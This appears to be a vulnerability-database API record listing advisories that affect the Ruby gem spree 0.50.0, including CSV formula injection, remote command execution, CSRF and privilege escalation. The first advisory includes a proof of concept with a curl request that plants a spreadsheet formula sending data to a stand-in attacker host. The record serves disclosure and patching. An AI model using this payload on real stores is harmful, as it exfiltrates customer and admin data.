Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/86146?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/86146?format=api", "purl": "pkg:gem/spree@0.50.0", "type": "gem", "namespace": "", "name": "spree", "version": "0.50.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/310104?format=api", "vulnerability_id": "VCID-153y-kwk2-xyfd", "summary": "Spree: CSV Formula Injection in Customer Export\n### Summary\n\nCSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted\nExport in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the\ncontext of the administrator's desktop, potentially exfiltrating data or executing OS commands\nvia DDE (Dynamic Data Exchange).\n\n---\n\n### Details\n\n#### Affected presenters and fields\n\n| Presenter | Path | User-controlled fields |\n|---|---|---|\n| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |\n\n#### Vulnerable code — `customer_presenter.rb` (representative example)\n\n```ruby\n# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53\ndef call\n csv = [\n customer.first_name, # ← written verbatim; may contain =HYPERLINK(...)\n customer.last_name, # ← user-controlled\n customer.email, \n customer.accepts_email_marketing ? 
Spree.t(:say_yes) : Spree.t(:say_no),\n customer.address&.company, # ← user-controlled\n customer.address&.address1, # ← user-controlled\n customer.address&.address2, # ← user-controlled\n customer.address&.city, # ← user-controlled\n customer.address&.state_text,\n customer.address&.state_abbr,\n customer.address&.country&.name,\n customer.address&.country&.iso,\n customer.address&.zipcode,\n customer.phone, # ← user-controlled\n customer.amount_spent_in(Spree::Store.current.default_currency),\n customer.completed_orders.count,\n ]\n csv += metafields_for_csv(customer)\n csv\nend\n```\n\n---\n\n### PoC\n\n**Precondition**: A Spree store with public customer registration enabled (default\nconfiguration). No special permissions required for the attacker.\n\n#### Step 1 — Register as a customer with an injected first name\n\n```bash\ncurl -X POST https://store.example.com/api/v3/store/customers \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Spree-Api-Key: pk_<publishable_api_key>\" \\\n -d '{\n \"email\": \"attacker@evil.com\",\n \"password\": \"password123\",\n \"password_confirmation\": \"password123\",\n \"first_name\": \"=HYPERLINK(\\\"http://attacker.example.com/exfil?d=\\\"&B1,\\\"Click\\\")\",\n \"last_name\": \"Smith\"\n }'\n```\n\n#### Step 2 — Admin triggers a customer export\n\n```bash\ncurl -X POST https://store.example.com/api/v3/admin/exports \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"type\": \"Spree::Exports::Customers\", \"record_selection\": \"all\"}'\n```\n\n#### Step 3 — Admin polls until ready, then downloads\n\n```bash\n# Poll for completion\ncurl https://store.example.com/api/v3/admin/exports/<export_id> \\\n -H \"Authorization: Bearer <admin_jwt>\"\n\n# Download\ncurl https://store.example.com/api/v3/admin/exports/<export_id>/download \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -o customers.csv\n```\n\n#### Step 4 — Verify injection in the raw CSV (without opening in 
Excel)\n\nOpen `customers.csv` in a text editor. The first data row will contain:\n\n```\n\"=HYPERLINK(\"\"http://attacker.example.com/exfil?d=\"\"&B1,\"\"Click\"\")\",\"Smith\",\"attacker@evil.com\",...\n```\n\n#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)\n\n- Excel warns about external data connections; if the administrator clicks **Enable**, the\n `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.\n- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain\n email, address, and order total data for all exported customers.\n- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess\n is launched on the administrator's machine.\n\n---\n\n### Impact\n\n**Vulnerability class**: CSV / Formula Injection (CWE-1236)\n\n#### Who is impacted\n\n- **Administrators** who download and open export files in spreadsheet software are the\n direct victims. Administrative accounts have access to all store data, payment method\n configurations, customer PII, and full order history.\n\n#### Realistic attack chain\n\n| Step | Actor | Action | Privilege required |\n|---|---|---|---|\n| 1 | Attacker | Registers as customer | Public registration |\n| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |\n| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |\n| 4 | Admin | Opens CSV in Excel | None |\n| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |\n\n#### Data at risk\n\nAll data visible to the administrator in the spreadsheet at the time of opening, including:\n\n- All exported customer emails, names, addresses, phone numbers\n- Order totals and purchase history\n- Any other columns in the same export file", "references": [ { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", 
"scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.2.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.2.8" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.3.6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.3.6" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.4.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.4.3" }, { "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79" }, { 
"reference_url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "GHSA-xf4v-w5x5-pv79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/506693?format=api", "purl": "pkg:gem/spree@5.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/506694?format=api", "purl": "pkg:gem/spree@5.3.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/506695?format=api", "purl": "pkg:gem/spree@5.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3" } ], "aliases": [ "GHSA-xf4v-w5x5-pv79" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51452?format=api", "vulnerability_id": "VCID-7jum-4ny7-xuhy", "summary": "Remote Command Execution in Spree search functionality\nSpree versions prior to 0.60.2 contain a remote command execution\nvulnerability in the search functionality. The application fails to\nproperly sanitize input passed via the `search[:send][]` parameter,\nwhich is dynamically invoked using Ruby’s `send` method. 
This allows\nattackers to execute arbitrary shell commands on the server without\nauthentication.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10019", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.6931", "scoring_system": "epss", "scoring_elements": "0.98663", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.6931", "scoring_system": "epss", "scoring_elements": "0.98664", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.79644", "scoring_system": "epss", "scoring_elements": "0.99115", "published_at": "2026-06-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10019" }, { "reference_url": "https://github.com/advisories/GHSA-97vm-c39p-jr86", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-97vm-c39p-jr86" }, { "reference_url": "https://github.com/orgs/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://github.com/orgs/spree" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { 
"value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb" }, { "reference_url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group" }, { "reference_url": "https://www.exploit-db.com/exploits/17941", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", 
"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://www.exploit-db.com/exploits/17941" }, { "reference_url": "https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10019", "reference_id": "CVE-2011-10019", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10019" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml", "reference_id": "CVE-2011-10019.YML", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml" }, { "reference_url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/", "reference_id": "remote-command-product-group", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86058?format=api", "purl": "pkg:gem/spree@0.60.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.60.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/158169?format=api", "purl": "pkg:gem/spree@0.70.0.rc2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": 
"VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.70.0.rc2" } ], "aliases": [ "CVE-2011-10019", "GHSA-97vm-c39p-jr86", "OSV-76011" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7jum-4ny7-xuhy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51451?format=api", "vulnerability_id": "VCID-cwh1-mmky-ukcx", "summary": "Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls\n### Impact\n\nThe perpetrator who previously obtained an old expired user\ntoken could use it to access Storefront API v2 endpoints.\n\n### Patches\n\nPlease upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15269", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49283", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49319", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49307", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49337", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49354", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49344", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15269" }, { "reference_url": 
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847" }, { "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15269", "reference_id": "CVE-2020-15269", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": 
"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15269" }, { "reference_url": "https://github.com/advisories/GHSA-f8cm-364f-q9qh", "reference_id": "GHSA-f8cm-364f-q9qh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f8cm-364f-q9qh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/78975?format=api", "purl": "pkg:gem/spree@3.7.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.7.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/78976?format=api", "purl": "pkg:gem/spree@4.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/78977?format=api", "purl": "pkg:gem/spree@4.1.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.1.11" } ], "aliases": [ "CVE-2020-15269", "GHSA-f8cm-364f-q9qh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cwh1-mmky-ukcx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37819?format=api", "vulnerability_id": "VCID-s4mu-v75h-dfep", "summary": "Private information access through CSRF\nA vulnerability in the API can allow an attacker to 
commit CSRF gaining access to private information.", "references": [ { "reference_url": "http://osvdb.org/show/osvdb/119205", "reference_id": "", "reference_type": "", "scores": [], "url": "http://osvdb.org/show/osvdb/119205" }, { "reference_url": "https://spreecommerce.com/blog/security-updates-2015-3-3", "reference_id": "", "reference_type": "", "scores": [], "url": "https://spreecommerce.com/blog/security-updates-2015-3-3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/52198?format=api", "purl": "pkg:gem/spree@2.2.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.2.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/52199?format=api", "purl": "pkg:gem/spree@2.3.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.3.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/52200?format=api", "purl": "pkg:gem/spree@2.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/52201?format=api", "purl": "pkg:gem/spree@3.0.0.rc4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.0.rc4" } ], "aliases": [ "OSVDB-119205" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s4mu-v75h-dfep" 
}, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37505?format=api", "vulnerability_id": "VCID-t9gu-2vs3-g7cu", "summary": "Permissions, Privileges, and Access Controls\napp/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2013-2506", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38121", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38098", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38087", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38055", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38145", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38149", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2013-2506" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml" }, { "reference_url": "https://github.com/spree/spree_auth_devise", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise" }, { "reference_url": "https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65" }, { "reference_url": "https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d" }, { "reference_url": "http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [], "url": "http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [], "url": "https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions" }, { "reference_url": 
